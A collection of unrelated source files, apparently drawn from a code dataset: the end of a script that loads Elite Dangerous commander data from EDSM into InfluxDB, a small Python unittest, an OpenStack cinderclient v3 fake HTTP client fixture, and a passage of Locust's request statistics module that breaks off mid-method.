except requests.exceptions.HTTPError as err:
print("HTTP request failed: %s" % (err))
sys.exit()
data = response.json()
print("Got credits from EDSM")
for credits in data['credits']:
points.append({
"measurement": "credits",
"time": datetime.fromisoformat(credits['date']).isoformat(),
"tags": {
"commander": EDSM_COMMANDER_NAME
},
"fields": {
"value": credits['balance']
}
})
try:
response = requests.get('https://www.edsm.net/api-commander-v1/get-ranks',
params={'commanderName':EDSM_COMMANDER_NAME, 'apiKey':EDSM_API_KEY})
response.raise_for_status()
except requests.exceptions.HTTPError as err:
print("HTTP request failed: %s" % (err))
sys.exit()
data = response.json()
print("Got ranks from EDSM")
add_rank(data, "Combat")
add_rank(data, "Trade")
add_rank(data, "Explore")
add_rank(data, "CQC")
add_rank(data, "Federation")
add_rank(data, "Empire")
requests_cache.install_cache('edsm')
data = fetch_jumps(date.today().isoformat() + " 00:00:00")
if len(data['logs']) > 0:
data = fetch_jumps(data['startDateTime'])
while len(data['logs']) == 0:
data = fetch_jumps(data['startDateTime'])
try:
client.write_points(points)
except InfluxDBClientError as err:
print("Unable to write points to InfluxDB: %s" % (err))
sys.exit()
print("Successfully wrote %s data points to InfluxDB" % (len(points)))
|
the-stack_106_16883
|
import unittest
import result
class TestCodeSlice(unittest.TestCase):
SOURCE_CODE = "#include <stdio.h>\n" \
"\n" \
"int main(void) {\n" \
" printf(\"Hello, world!\\n\");\n" \
" \n" \
" return 0;\n" \
"}\n" \
"\n"
def test_get_code_from(self):
code_slice = result.CodeSlice(
result.CodePosition(4, 3),
result.CodePosition(6, 8),
)
res = code_slice.get_code_from(TestCodeSlice.SOURCE_CODE)
self.assertEqual("printf(\"Hello, world!\\n\");\n"
" \n"
" return\n",
res)
if __name__ == '__main__':
unittest.main()
|
the-stack_106_16885
|
# Copyright (c) 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
from cinderclient.tests.unit import fakes
from cinderclient.v3 import client
from cinderclient.tests.unit.v2 import fakes as fake_v2
def _stub_group(detailed=True, **kwargs):
group = {
"name": "test-1",
"id": "1234",
}
if detailed:
details = {
"created_at": "2012-08-28T16:30:31.000000",
"description": "test-1-desc",
"availability_zone": "zone1",
"status": "available",
"group_type": "my_group_type",
}
group.update(details)
group.update(kwargs)
return group
def _stub_group_snapshot(detailed=True, **kwargs):
group_snapshot = {
"name": None,
"id": "5678",
}
if detailed:
details = {
"created_at": "2012-08-28T16:30:31.000000",
"description": None,
"name": None,
"id": "5678",
"status": "available",
"group_id": "1234",
}
group_snapshot.update(details)
group_snapshot.update(kwargs)
return group_snapshot
def _stub_snapshot(**kwargs):
snapshot = {
"created_at": "2012-08-28T16:30:31.000000",
"display_description": None,
"display_name": None,
"id": '11111111-1111-1111-1111-111111111111',
"size": 1,
"status": "available",
"volume_id": '00000000-0000-0000-0000-000000000000',
}
snapshot.update(kwargs)
return snapshot
class FakeClient(fakes.FakeClient, client.Client):
def __init__(self, api_version=None, *args, **kwargs):
client.Client.__init__(self, 'username', 'password',
'project_id', 'auth_url',
extensions=kwargs.get('extensions'))
self.api_version = api_version
global_id = "req-f551871a-4950-4225-9b2c-29a14c8f075e"
self.client = FakeHTTPClient(api_version=api_version,
global_request_id=global_id, **kwargs)
def get_volume_api_version_from_endpoint(self):
return self.client.get_volume_api_version_from_endpoint()
class FakeHTTPClient(fake_v2.FakeHTTPClient):
def __init__(self, **kwargs):
super(FakeHTTPClient, self).__init__()
self.management_url = 'http://10.0.2.15:8776/v3/fake'
vars(self).update(kwargs)
#
# Services
#
def get_os_services(self, **kw):
host = kw.get('host', None)
binary = kw.get('binary', None)
services = [
{
'id': 1,
'binary': 'cinder-volume',
'host': 'host1',
'zone': 'cinder',
'status': 'enabled',
'state': 'up',
'updated_at': datetime(2012, 10, 29, 13, 42, 2),
'cluster': 'cluster1',
},
{
'id': 2,
'binary': 'cinder-volume',
'host': 'host2',
'zone': 'cinder',
'status': 'disabled',
'state': 'down',
'updated_at': datetime(2012, 9, 18, 8, 3, 38),
'cluster': 'cluster1',
},
{
'id': 3,
'binary': 'cinder-scheduler',
'host': 'host2',
'zone': 'cinder',
'status': 'disabled',
'state': 'down',
'updated_at': datetime(2012, 9, 18, 8, 3, 38),
'cluster': 'cluster2',
},
]
if host:
services = [i for i in services if i['host'] == host]
if binary:
services = [i for i in services if i['binary'] == binary]
if not self.api_version.matches('3.7'):
for svc in services:
del svc['cluster']
return (200, {}, {'services': services})
#
# Clusters
#
def _filter_clusters(self, return_keys, **kw):
date = datetime(2012, 10, 29, 13, 42, 2),
clusters = [
{
'id': '1',
'name': 'cluster1@lvmdriver-1',
'state': 'up',
'status': 'enabled',
'binary': 'cinder-volume',
'is_up': 'True',
'disabled': 'False',
'disabled_reason': None,
'num_hosts': '3',
'num_down_hosts': '2',
'updated_at': date,
'created_at': date,
'last_heartbeat': date,
},
{
'id': '2',
'name': 'cluster1@lvmdriver-2',
'state': 'down',
'status': 'enabled',
'binary': 'cinder-volume',
'is_up': 'False',
'disabled': 'False',
'disabled_reason': None,
'num_hosts': '2',
'num_down_hosts': '2',
'updated_at': date,
'created_at': date,
'last_heartbeat': date,
},
{
'id': '3',
'name': 'cluster2',
'state': 'up',
'status': 'disabled',
'binary': 'cinder-backup',
'is_up': 'True',
'disabled': 'True',
'disabled_reason': 'Reason',
'num_hosts': '1',
'num_down_hosts': '0',
'updated_at': date,
'created_at': date,
'last_heartbeat': date,
},
]
for key, value in kw.items():
clusters = [cluster for cluster in clusters
if cluster[key] == str(value)]
result = []
for cluster in clusters:
result.append({key: cluster[key] for key in return_keys})
return result
CLUSTER_SUMMARY_KEYS = ('name', 'binary', 'state', 'status')
CLUSTER_DETAIL_KEYS = (CLUSTER_SUMMARY_KEYS +
('num_hosts', 'num_down_hosts', 'last_heartbeat',
'disabled_reason', 'created_at', 'updated_at'))
def get_clusters(self, **kw):
clusters = self._filter_clusters(self.CLUSTER_SUMMARY_KEYS, **kw)
return (200, {}, {'clusters': clusters})
def get_clusters_detail(self, **kw):
clusters = self._filter_clusters(self.CLUSTER_DETAIL_KEYS, **kw)
return (200, {}, {'clusters': clusters})
def get_clusters_1(self):
res = self.get_clusters_detail(id=1)
return (200, {}, {'cluster': res[2]['clusters'][0]})
def put_clusters_enable(self, body):
res = self.get_clusters(id=1)
return (200, {}, {'cluster': res[2]['clusters'][0]})
def put_clusters_disable(self, body):
res = self.get_clusters(id=3)
return (200, {}, {'cluster': res[2]['clusters'][0]})
#
# Backups
#
def put_backups_1234(self, **kw):
backup = fake_v2._stub_backup(
id='1234',
base_uri='http://localhost:8776',
tenant_id='0fa851f6668144cf9cd8c8419c1646c1')
return (200, {},
{'backups': backup})
#
# Attachments
#
def post_attachments(self, **kw):
return (202, {}, {
'attachment': {'instance': 1234,
'name': 'attachment-1',
'volume_id': 'fake_volume_1',
'status': 'reserved'}})
def get_attachments(self, **kw):
return (200, {}, {
'attachments': [{'instance': 1,
'name': 'attachment-1',
'volume_id': 'fake_volume_1',
'status': 'reserved'},
{'instance': 2,
'name': 'attachment-2',
'volume_id': 'fake_volume_2',
'status': 'reserverd'}]})
def get_attachments_1234(self, **kw):
return (200, {}, {
'attachment': {'instance': 1234,
'name': 'attachment-1',
'volume_id': 'fake_volume_1',
'status': 'reserved'}})
def put_attachments_1234(self, **kw):
return (200, {}, {
'attachment': {'instance': 1234,
'name': 'attachment-1',
'volume_id': 'fake_volume_1',
'status': 'reserved'}})
def delete_attachments_1234(self, **kw):
return 204, {}, None
#
# GroupTypes
#
def get_group_types(self, **kw):
return (200, {}, {
'group_types': [{'id': 1,
'name': 'test-type-1',
'description': 'test_type-1-desc',
'group_specs': {}},
{'id': 2,
'name': 'test-type-2',
'description': 'test_type-2-desc',
'group_specs': {}}]})
def get_group_types_1(self, **kw):
return (200, {}, {'group_type': {'id': 1,
'name': 'test-type-1',
'description': 'test_type-1-desc',
'group_specs': {u'key': u'value'}}})
def get_group_types_2(self, **kw):
return (200, {}, {'group_type': {'id': 2,
'name': 'test-type-2',
'description': 'test_type-2-desc',
'group_specs': {}}})
def get_group_types_3(self, **kw):
return (200, {}, {'group_type': {'id': 3,
'name': 'test-type-3',
'description': 'test_type-3-desc',
'group_specs': {},
'is_public': False}})
def get_group_types_default(self, **kw):
return self.get_group_types_1()
def post_group_types(self, body, **kw):
return (202, {}, {'group_type': {'id': 3,
'name': 'test-type-3',
'description': 'test_type-3-desc',
'group_specs': {}}})
def post_group_types_1_group_specs(self, body, **kw):
assert list(body) == ['group_specs']
return (200, {}, {'group_specs': {'k': 'v'}})
def delete_group_types_1_group_specs_k(self, **kw):
return(204, {}, None)
def delete_group_types_1_group_specs_m(self, **kw):
return(204, {}, None)
def delete_group_types_1(self, **kw):
return (202, {}, None)
def delete_group_types_3_group_specs_k(self, **kw):
return(204, {}, None)
def delete_group_types_3(self, **kw):
return (202, {}, None)
def put_group_types_1(self, **kw):
return self.get_group_types_1()
#
# Groups
#
def get_groups_detail(self, **kw):
return (200, {}, {"groups": [
_stub_group(id='1234'),
_stub_group(id='4567')]})
def get_groups(self, **kw):
return (200, {}, {"groups": [
_stub_group(detailed=False, id='1234'),
_stub_group(detailed=False, id='4567')]})
def get_groups_1234(self, **kw):
return (200, {}, {'group':
_stub_group(id='1234')})
def post_groups(self, **kw):
group = _stub_group(id='1234', group_type='my_group_type',
volume_types=['type1', 'type2'])
return (202, {}, {'group': group})
def put_groups_1234(self, **kw):
return (200, {}, {'group': {}})
def post_groups_1234_action(self, body, **kw):
resp = 202
assert len(list(body)) == 1
action = list(body)[0]
if action == 'delete':
assert 'delete-volumes' in body[action]
elif action in ('enable_replication', 'disable_replication',
'failover_replication', 'list_replication_targets'):
assert action in body
else:
raise AssertionError("Unexpected action: %s" % action)
return (resp, {}, {})
def post_groups_action(self, body, **kw):
group = _stub_group(id='1234', group_type='my_group_type',
volume_types=['type1', 'type2'])
resp = 202
assert len(list(body)) == 1
action = list(body)[0]
if action == 'create-from-src':
assert ('group_snapshot_id' in body[action] or
'source_group_id' in body[action])
else:
raise AssertionError("Unexpected action: %s" % action)
return (resp, {}, {'group': group})
#
# group_snapshots
#
def get_group_snapshots_detail(self, **kw):
return (200, {}, {"group_snapshots": [
_stub_group_snapshot(id='1234'),
_stub_group_snapshot(id='4567')]})
def get_group_snapshots(self, **kw):
return (200, {}, {"group_snapshots": [
_stub_group_snapshot(detailed=False, id='1234'),
_stub_group_snapshot(detailed=False, id='4567')]})
def get_group_snapshots_1234(self, **kw):
return (200, {}, {'group_snapshot': _stub_group_snapshot(id='1234')})
def get_group_snapshots_5678(self, **kw):
return (200, {}, {'group_snapshot': _stub_group_snapshot(id='5678')})
def post_group_snapshots(self, **kw):
group_snap = _stub_group_snapshot()
return (202, {}, {'group_snapshot': group_snap})
def put_group_snapshots_1234(self, **kw):
return (200, {}, {'group_snapshot': {}})
def post_groups_1234_action(self, **kw):
return (202, {}, {})
def get_groups_5678(self, **kw):
return (200, {}, {'group':
_stub_group(id='5678')})
def post_groups_5678_action(self, **kw):
return (202, {}, {})
def post_snapshots_1234_action(self, **kw):
return (202, {}, {})
def get_snapshots_1234(self, **kw):
return (200, {}, {'snapshot': _stub_snapshot(id='1234')})
def post_snapshots_5678_action(self, **kw):
return (202, {}, {})
def get_snapshots_5678(self, **kw):
return (200, {}, {'snapshot': _stub_snapshot(id='5678')})
def post_group_snapshots_1234_action(self, **kw):
return (202, {}, {})
def post_group_snapshots_5678_action(self, **kw):
return (202, {}, {})
def get_group_snapshots_5678(self, **kw):
return (200, {}, {'group_snapshot': _stub_group_snapshot(id='5678')})
def delete_group_snapshots_1234(self, **kw):
return (202, {}, {})
#
# Manageable volumes/snapshots
#
def get_manageable_volumes(self, **kw):
vol_id = "volume-ffffffff-0000-ffff-0000-ffffffffffff"
vols = [{"size": 4, "safe_to_manage": False, "actual_size": 4.0,
"reference": {"source-name": vol_id}},
{"size": 5, "safe_to_manage": True, "actual_size": 4.3,
"reference": {"source-name": "myvol"}}]
return (200, {}, {"manageable-volumes": vols})
def get_manageable_volumes_detail(self, **kw):
vol_id = "volume-ffffffff-0000-ffff-0000-ffffffffffff"
vols = [{"size": 4, "reason_not_safe": "volume in use",
"safe_to_manage": False, "extra_info": "qos_setting:high",
"reference": {"source-name": vol_id},
"actual_size": 4.0},
{"size": 5, "reason_not_safe": None, "safe_to_manage": True,
"extra_info": "qos_setting:low", "actual_size": 4.3,
"reference": {"source-name": "myvol"}}]
return (200, {}, {"manageable-volumes": vols})
def get_manageable_snapshots(self, **kw):
snap_id = "snapshot-ffffffff-0000-ffff-0000-ffffffffffff"
snaps = [{"actual_size": 4.0, "size": 4,
"safe_to_manage": False, "source_id_type": "source-name",
"source_cinder_id": "00000000-ffff-0000-ffff-00000000",
"reference": {"source-name": snap_id},
"source_identifier": "volume-00000000-ffff-0000-ffff-000000"},
{"actual_size": 4.3, "reference": {"source-name": "mysnap"},
"source_id_type": "source-name", "source_identifier": "myvol",
"safe_to_manage": True, "source_cinder_id": None, "size": 5}]
return (200, {}, {"manageable-snapshots": snaps})
def get_manageable_snapshots_detail(self, **kw):
snap_id = "snapshot-ffffffff-0000-ffff-0000-ffffffffffff"
snaps = [{"actual_size": 4.0, "size": 4,
"safe_to_manage": False, "source_id_type": "source-name",
"source_cinder_id": "00000000-ffff-0000-ffff-00000000",
"reference": {"source-name": snap_id},
"source_identifier": "volume-00000000-ffff-0000-ffff-000000",
"extra_info": "qos_setting:high",
"reason_not_safe": "snapshot in use"},
{"actual_size": 4.3, "reference": {"source-name": "mysnap"},
"safe_to_manage": True, "source_cinder_id": None,
"source_id_type": "source-name", "identifier": "mysnap",
"source_identifier": "myvol", "size": 5,
"extra_info": "qos_setting:low", "reason_not_safe": None}]
return (200, {}, {"manageable-snapshots": snaps})
#
# Messages
#
def get_messages(self, **kw):
return 200, {}, {'messages': [
{
'id': '1234',
'event_id': 'VOLUME_000002',
'user_message': 'Fake Message',
'created_at': '2012-08-27T00:00:00.000000',
'guaranteed_until': "2013-11-12T21:00:00.000000",
},
{
'id': '12345',
'event_id': 'VOLUME_000002',
'user_message': 'Fake Message',
'created_at': '2012-08-27T00:00:00.000000',
'guaranteed_until': "2013-11-12T21:00:00.000000",
}
]}
def delete_messages_1234(self, **kw):
return 204, {}, None
def delete_messages_12345(self, **kw):
return 204, {}, None
def get_messages_1234(self, **kw):
message = {
'id': '1234',
'event_id': 'VOLUME_000002',
'user_message': 'Fake Message',
'created_at': '2012-08-27T00:00:00.000000',
'guaranteed_until': "2013-11-12T21:00:00.000000",
}
return 200, {}, {'message': message}
def get_messages_12345(self, **kw):
message = {
'id': '12345',
'event_id': 'VOLUME_000002',
'user_message': 'Fake Message',
'created_at': '2012-08-27T00:00:00.000000',
'guaranteed_until': "2013-11-12T21:00:00.000000",
}
return 200, {}, {'message': message}
def put_os_services_set_log(self, body):
return (202, {}, {})
def put_os_services_get_log(self, body):
levels = [{'binary': 'cinder-api', 'host': 'host1',
'levels': {'prefix1': 'DEBUG', 'prefix2': 'INFO'}},
{'binary': 'cinder-volume', 'host': 'host@backend#pool',
'levels': {'prefix3': 'WARNING', 'prefix4': 'ERROR'}}]
return (200, {}, {'log_levels': levels})
def get_volumes_summary(self, **kw):
return 200, {}, {"volume-summary": {'total_size': 5,
'total_count': 5,
'metadata': {
"test_key": ["test_value"]
}
}
}
#
# resource filters
#
def get_resource_filters(self, **kw):
return 200, {}, {'resource_filters': []}
def fake_request_get():
versions = {'versions': [{'id': 'v1.0',
'links': [{'href': 'http://docs.openstack.org/',
'rel': 'describedby',
'type': 'text/html'},
{'href': 'http://192.168.122.197/v1/',
'rel': 'self'}],
'media-types': [{'base': 'application/json',
'type': 'application/'}],
'min_version': '',
'status': 'DEPRECATED',
'updated': '2016-05-02T20:25:19Z',
'version': ''},
{'id': 'v2.0',
'links': [{'href': 'http://docs.openstack.org/',
'rel': 'describedby',
'type': 'text/html'},
{'href': 'http://192.168.122.197/v2/',
'rel': 'self'}],
'media-types': [{'base': 'application/json',
'type': 'application/'}],
'min_version': '',
'status': 'SUPPORTED',
'updated': '2014-06-28T12:20:21Z',
'version': ''},
{'id': 'v3.0',
'links': [{'href': 'http://docs.openstack.org/',
'rel': 'describedby',
'type': 'text/html'},
{'href': 'http://192.168.122.197/v3/',
'rel': 'self'}],
'media-types': [{'base': 'application/json',
'type': 'application/'}],
'min_version': '3.0',
'status': 'CURRENT',
'updated': '2016-02-08T12:20:21Z',
'version': '3.16'}]}
return versions
def fake_request_get_no_v3():
versions = {'versions': [{'id': 'v1.0',
'links': [{'href': 'http://docs.openstack.org/',
'rel': 'describedby',
'type': 'text/html'},
{'href': 'http://192.168.122.197/v1/',
'rel': 'self'}],
'media-types': [{'base': 'application/json',
'type': 'application/'}],
'min_version': '',
'status': 'DEPRECATED',
'updated': '2016-05-02T20:25:19Z',
'version': ''},
{'id': 'v2.0',
'links': [{'href': 'http://docs.openstack.org/',
'rel': 'describedby',
'type': 'text/html'},
{'href': 'http://192.168.122.197/v2/',
'rel': 'self'}],
'media-types': [{'base': 'application/json',
'type': 'application/'}],
'min_version': '',
'status': 'SUPPORTED',
'updated': '2014-06-28T12:20:21Z',
'version': ''}]}
return versions
|
the-stack_106_16886
|
import datetime
import hashlib
import time
from collections import namedtuple, OrderedDict
from copy import copy
from itertools import chain
import os
import csv
import signal
import gevent
from .exception import StopUser, CatchResponseError
import logging
console_logger = logging.getLogger("locust.stats_logger")
"""Space in table for request name. Auto shrink it if terminal is small (<160 characters)"""
try:
STATS_NAME_WIDTH = max(min(os.get_terminal_size()[0] - 80, 80), 0)
except OSError: # not a real terminal
STATS_NAME_WIDTH = 80
STATS_AUTORESIZE = True # overwrite this if you dont want auto resize while running
def resize_handler(signum, frame):
global STATS_NAME_WIDTH
if STATS_AUTORESIZE:
try:
STATS_NAME_WIDTH = max(min(os.get_terminal_size()[0] - 80, 80), 0)
except OSError: # not a real terminal
pass
try:
signal.signal(signal.SIGWINCH, resize_handler)
except AttributeError:
pass # Windows doesnt have SIGWINCH
STATS_TYPE_WIDTH = 8
"""Default interval for how frequently results are written to console."""
CONSOLE_STATS_INTERVAL_SEC = 2
"""Default interval for how frequently results are written to history."""
HISTORY_STATS_INTERVAL_SEC = 5
"""Default interval for how frequently CSV files are written if this option is configured."""
CSV_STATS_INTERVAL_SEC = 1
CSV_STATS_FLUSH_INTERVAL_SEC = 10
"""
Default window size/resolution - in seconds - when calculating the current
response time percentile
"""
CURRENT_RESPONSE_TIME_PERCENTILE_WINDOW = 10
CachedResponseTimes = namedtuple("CachedResponseTimes", ["response_times", "num_requests"])
PERCENTILES_TO_REPORT = [0.50, 0.66, 0.75, 0.80, 0.90, 0.95, 0.98, 0.99, 0.999, 0.9999, 1.0]
class RequestStatsAdditionError(Exception):
pass
def get_readable_percentiles(percentile_list):
"""
Converts a list of percentiles from 0-1 fraction to 0%-100% view for using in console & csv reporting
:param percentile_list: The list of percentiles in range 0-1
:return: The list of string representation for each percentile in 0%-100% view
"""
return [
f"{int(percentile * 100) if (percentile * 100).is_integer() else round(100 * percentile, 6)}%"
for percentile in percentile_list
]
def calculate_response_time_percentile(response_times, num_requests, percent):
"""
Get the response time that a certain number of percent of the requests
finished within. Arguments:
response_times: A StatsEntry.response_times dict
num_requests: Number of request made (could be derived from response_times,
but we save some CPU cycles by using the value which we already store)
percent: The percentile we want to calculate. Specified in range: 0.0 - 1.0
"""
num_of_request = int((num_requests * percent))
processed_count = 0
for response_time in sorted(response_times.keys(), reverse=True):
processed_count += response_times[response_time]
if num_requests - processed_count <= num_of_request:
return response_time
# if all response times were None
return 0
def diff_response_time_dicts(latest, old):
"""
Returns the delta between two {response_times:request_count} dicts.
Used together with the response_times cache to get the response times for the
last X seconds, which in turn is used to calculate the current response time
percentiles.
"""
new = {}
for t in latest:
diff = latest[t] - old.get(t, 0)
if diff:
new[t] = diff
return new
class RequestStats:
"""
Class that holds the request statistics. Accessible in a User from self.environment.stats
"""
def __init__(self, use_response_times_cache=True):
"""
:param use_response_times_cache: The value of use_response_times_cache will be set for each StatsEntry()
when they are created. Settings it to False saves some memory and CPU
cycles which we can do on Worker nodes where the response_times_cache
is not needed.
"""
self.use_response_times_cache = use_response_times_cache
self.entries: dict[str, StatsEntry] = {}
self.errors: dict[str, StatsError] = {}
self.total = StatsEntry(self, "Aggregated", None, use_response_times_cache=self.use_response_times_cache)
self.history = []
@property
def num_requests(self):
return self.total.num_requests
@property
def num_none_requests(self):
return self.total.num_none_requests
@property
def num_failures(self):
return self.total.num_failures
@property
def last_request_timestamp(self):
return self.total.last_request_timestamp
@property
def start_time(self):
return self.total.start_time
def log_request(self, method, name, response_time, content_length):
self.total.log(response_time, content_length)
self.get(name, method).log(response_time, content_length)
def log_error(self, method, name, error):
self.total.log_error(error)
self.get(name, method).log_error(error)
# store error in errors dict
key = StatsError.create_key(method, name, error)
entry = self.errors.get(key)
if not entry:
entry = StatsError(method, name, error)
self.errors[key] = entry
entry.occurred()
def get(self, name, method):
"""
Retrieve a StatsEntry instance by name and method
"""
entry = self.entries.get((name, method))
if not entry:
entry = StatsEntry(self, name, method, use_response_times_cache=self.use_response_times_cache)
self.entries[(name, method)] = entry
return entry
def reset_all(self):
"""
Go through all stats entries and reset them to zero
"""
self.total.reset()
self.errors = {}
for r in self.entries.values():
r.reset()
self.history = []
def clear_all(self):
"""
Remove all stats entries and errors
"""
self.total = StatsEntry(self, "Aggregated", None, use_response_times_cache=self.use_response_times_cache)
self.entries = {}
self.errors = {}
self.history = []
def serialize_stats(self):
return [
self.entries[key].get_stripped_report()
for key in self.entries.keys()
if not (self.entries[key].num_requests == 0 and self.entries[key].num_failures == 0)
]
def serialize_errors(self):
return dict([(k, e.to_dict()) for k, e in self.errors.items()])
class StatsEntry:
"""
Represents a single stats entry (name and method)
"""
def __init__(self, stats: RequestStats, name: str, method: str, use_response_times_cache=False):
self.stats = stats
self.name = name
""" Name (URL) of this stats entry """
self.method = method
""" Method (GET, POST, PUT, etc.) """
self.use_response_times_cache = use_response_times_cache
"""
If set to True, the copy of the response_time dict will be stored in response_times_cache
every second, and kept for 20 seconds (by default, will be CURRENT_RESPONSE_TIME_PERCENTILE_WINDOW + 10).
We can use this dict to calculate the *current* median response time, as well as other response
time percentiles.
"""
self.num_requests = 0
""" The number of requests made """
self.num_none_requests = 0
""" The number of requests made with a None response time (typically async requests) """
self.num_failures = 0
""" Number of failed request """
self.total_response_time = 0
""" Total sum of the response times """
self.min_response_time = None
""" Minimum response time """
self.max_response_time = 0
""" Maximum response time """
self.num_reqs_per_sec = {}
""" A {second => request_count} dict that holds the number of requests made per second """
self.num_fail_per_sec = {}
""" A (second => failure_count) dict that hold the number of failures per second """
self.response_times = {}
"""
A {response_time => count} dict that holds the response time distribution of all
the requests.
The keys (the response time in ms) are rounded to store 1, 2, ... 9, 10, 20. .. 90,
100, 200 .. 900, 1000, 2000 ... 9000, in order to save memory.
This dict is used to calculate the median and percentile response times.
"""
self.response_times_cache = None
"""
If use_response_times_cache is set to True, this will be a {timestamp => CachedResponseTimes()}
OrderedDict that holds a copy of the response_times dict for each of the last 20 seconds.
"""
self.total_content_length = 0
""" The sum of the content length of all the requests for this entry """
self.start_time = 0.0
""" Time of the first request for this entry """
self.last_request_timestamp = None
""" Time of the last request for this entry """
self.reset()
def reset(self):
self.start_time = time.time()
self.num_requests = 0
self.num_none_requests = 0
self.num_failures = 0
self.total_response_time = 0
self.response_times = {}
self.min_response_time = None
self.max_response_time = 0
self.last_request_timestamp = None
self.num_reqs_per_sec = {}
self.num_fail_per_sec = {}
self.total_content_length = 0
if self.use_response_times_cache:
self.response_times_cache = OrderedDict()
self._cache_response_times(int(time.time()))
def log(self, response_time, content_length):
# get the time
current_time = time.time()
t = int(current_time)
if self.use_response_times_cache and self.last_request_timestamp and t > int(self.last_request_timestamp):
# see if we shall make a copy of the response_times dict and store in the cache
self._cache_response_times(t - 1)
self.num_requests += 1
self._log_time_of_request(current_time)
self._log_response_time(response_time)
# increase total content-length
self.total_content_length += content_length
def _log_time_of_request(self, current_time):
t = int(current_time)
self.num_reqs_per_sec[t] = self.num_reqs_per_sec.setdefault(t, 0) + 1
self.last_request_timestamp = current_time
def _log_response_time(self, response_time):
if response_time is None:
self.num_none_requests += 1
return
self.total_response_time += response_time
if self.min_response_time is None:
self.min_response_time = response_time
self.min_response_time = min(self.min_response_time, response_time)
self.max_response_time = max(self.max_response_time, response_time)
# to avoid to much data that has to be transferred to the master node when
# running in distributed mode, we save the response time rounded in a dict
# so that 147 becomes 150, 3432 becomes 3400 and 58760 becomes 59000
if response_time < 100:
rounded_response_time = round(response_time)
elif response_time < 1000:
rounded_response_time = round(response_time, -1)
elif response_time < 10000:
rounded_response_time = round(response_time, -2)
else:
rounded_response_time = round(response_time, -3)
# increase request count for the rounded key in response time dict
self.response_times.setdefault(rounded_response_time, 0)
self.response_times[rounded_response_time] += 1
def log_error(self, error):
self.num_failures += 1
t = int(time.time())
self.num_fail_per_sec[t] = self.num_fail_per_sec.setdefault(t, 0) + 1
@property
def fail_ratio(self):
try:
return float(self.num_failures) / self.num_requests
except ZeroDivisionError:
if self.num_failures > 0:
return 1.0
else:
return 0.0
@property
def avg_response_time(self):
try:
return float(self.total_response_time) / (self.num_requests - self.num_none_requests)
except ZeroDivisionError:
return 0
@property
def median_response_time(self):
if not self.response_times:
return 0
median = median_from_dict(self.num_requests - self.num_none_requests, self.response_times) or 0
# Since we only use two digits of precision when calculating the median response time
# while still using the exact values for min and max response times, the following checks
# makes sure that we don't report a median > max or median < min when a StatsEntry only
# have one (or very few) really slow requests
if median > self.max_response_time:
median = self.max_response_time
elif median < self.min_response_time:
median = self.min_response_time
return median
@property
def current_rps(self):
if self.stats.last_request_timestamp is None:
return 0
slice_start_time = max(int(self.stats.last_request_timestamp) - 12, int(self.stats.start_time or 0))
reqs = [
self.num_reqs_per_sec.get(t, 0) for t in range(slice_start_time, int(self.stats.last_request_timestamp) - 2)
]
return avg(reqs)
@property
def current_fail_per_sec(self):
if self.stats.last_request_timestamp is None:
return 0
slice_start_time = max(int(self.stats.last_request_timestamp) - 12, int(self.stats.start_time or 0))
reqs = [
self.num_fail_per_sec.get(t, 0) for t in range(slice_start_time, int(self.stats.last_request_timestamp) - 2)
]
return avg(reqs)
@property
def total_rps(self):
if not self.stats.last_request_timestamp or not self.stats.start_time:
return 0.0
try:
return self.num_requests / (self.stats.last_request_timestamp - self.stats.start_time)
except ZeroDivisionError:
return 0.0
@property
def total_fail_per_sec(self):
if not self.stats.last_request_timestamp or not self.stats.start_time:
return 0.0
try:
return self.num_failures / (self.stats.last_request_timestamp - self.stats.start_time)
except ZeroDivisionError:
return 0.0
@property
def avg_content_length(self):
try:
return self.total_content_length / self.num_requests
except ZeroDivisionError:
return 0
def extend(self, other):
"""
Extend the data from the current StatsEntry with the stats from another
StatsEntry instance.
"""
# save the old last_request_timestamp, to see if we should store a new copy
# of the response times in the response times cache
old_last_request_timestamp = self.last_request_timestamp
if self.last_request_timestamp is not None and other.last_request_timestamp is not None:
self.last_request_timestamp = max(self.last_request_timestamp, other.last_request_timestamp)
elif other.last_request_timestamp is not None:
self.last_request_timestamp = other.last_request_timestamp
self.start_time = min(self.start_time, other.start_time)
self.num_requests = self.num_requests + other.num_requests
self.num_none_requests = self.num_none_requests + other.num_none_requests
self.num_failures = self.num_failures + other.num_failures
self.total_response_time = self.total_response_time + other.total_response_time
self.max_response_time = max(self.max_response_time, other.max_response_time)
if self.min_response_time is not None and other.min_response_time is not None:
self.min_response_time = min(self.min_response_time, other.min_response_time)
elif other.min_response_time is not None:
# this means self.min_response_time is None, so we can safely replace it
self.min_response_time = other.min_response_time
self.total_content_length = self.total_content_length + other.total_content_length
for key in other.response_times:
self.response_times[key] = self.response_times.get(key, 0) + other.response_times[key]
for key in other.num_reqs_per_sec:
self.num_reqs_per_sec[key] = self.num_reqs_per_sec.get(key, 0) + other.num_reqs_per_sec[key]
for key in other.num_fail_per_sec:
self.num_fail_per_sec[key] = self.num_fail_per_sec.get(key, 0) + other.num_fail_per_sec[key]
if self.use_response_times_cache:
# If we've entered a new second, we'll cache the response times. Note that there
# might still be reports from other worker nodes - that contains requests for the same
# time periods - that hasn't been received/accounted for yet. This will cause the cache to
# lag behind a second or two, but since StatsEntry.current_response_time_percentile()
# (which is what the response times cache is used for) uses an approximation of the
# last 10 seconds anyway, it should be fine to ignore this.
last_time = self.last_request_timestamp and int(self.last_request_timestamp) or None
if last_time and last_time > (old_last_request_timestamp and int(old_last_request_timestamp) or 0):
self._cache_response_times(last_time)
def serialize(self):
return {
"name": self.name,
"method": self.method,
"last_request_timestamp": self.last_request_timestamp,
"start_time": self.start_time,
"num_requests": self.num_requests,
"num_none_requests": self.num_none_requests,
"num_failures": self.num_failures,
"total_response_time": self.total_response_time,
"max_response_time": self.max_response_time,
"min_response_time": self.min_response_time,
"total_content_length": self.total_content_length,
"response_times": self.response_times,
"num_reqs_per_sec": self.num_reqs_per_sec,
"num_fail_per_sec": self.num_fail_per_sec,
}
@classmethod
def unserialize(cls, data):
obj = cls(None, data["name"], data["method"])
for key in [
"last_request_timestamp",
"start_time",
"num_requests",
"num_none_requests",
"num_failures",
"total_response_time",
"max_response_time",
"min_response_time",
"total_content_length",
"response_times",
"num_reqs_per_sec",
"num_fail_per_sec",
]:
